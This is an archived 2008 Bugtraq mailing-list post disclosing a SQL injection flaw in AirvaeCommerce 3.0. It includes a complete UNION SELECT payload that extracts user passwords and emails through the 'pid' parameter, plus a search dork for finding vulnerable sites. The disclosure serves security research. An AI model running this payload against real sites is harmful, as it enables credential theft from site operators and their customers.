Remote SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Remote SQL Injection
From: saidmoftakhar@xxxxxx
Date: 28 Jun 2008 17:33:49 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Author :: Dr-Linux saidmoftakhar(at)gmx(dot)de
Application :: AirvaeCommerce 3.0
Download :: http://www.airvaecommerce.com
Dork 1 ::  powered by AirvaeCommerce 3.0
--------------------------------------------[C o n t e x 
t]-----------------------------------------
 
Vulnerability: http://localhost/ path script / ?p=vzh&pid= [SQL]
Example : 
/?p=vzh&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
           
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/*

Note : Some site used SELECT statements have a different number of columns 
about 45  .
 
-------------------------------------------[End of  
context]----------------------------------------

Follow-Ups:
- Re: Remote SQL Injection
  - From: packet

Prev by Date: Multiple vulnerabilities in S.T.A.L.K.E.R. 1.0006
Next by Date: Endless loop in Halo 1.07
Previous by thread: Multiple vulnerabilities in S.T.A.L.K.E.R. 1.0006
Next by thread: Re: Remote SQL Injection
Index(es):
- Date
- Thread